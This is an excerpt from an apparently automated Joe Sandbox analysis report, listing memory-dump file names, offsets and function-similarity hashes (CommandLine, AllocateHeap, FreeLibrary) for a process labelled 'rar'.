                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CommandLine
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3253501508-0
                                                                                                                                                                                                                                                              • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                                              • Instruction ID: 5dbecc334fd14a9744734c73d16766462bcbfcf0cde72bf99bd5cdbb987c199e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C901961160CE4285EB90F736A4801FE5A60FF85FA4F580571EE8D8736ADE3DD4418748
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                                              • Instruction ID: d21e84c1ea1d53fa05af1ab1ebdf78c8f646f252b1a31c368dec7e94e572eb73
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 75017C50A0DE8340FB64A6769AC037931B35F94FF4F0882B0ED1DC62D6EE2CE401628D
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                                                              • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                                              • Instruction ID: 4836fc4f5570aa18946f2e6a404e33aaba31046bb9615a64282a9891c604dd7d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EF08221B1DA8341FF546AB159C027532A24F84FB0F090AF0ED2EC53C6EE5DE840639C
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                                              • Instruction ID: ad16ade03feb5ce451c4dbb137ba04c349214bed1f24d93931f051ac2239db57
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10D05E65E1ADC2C6F704CB61F84433022617F54FB9F610635C41CC4550CFADA148A388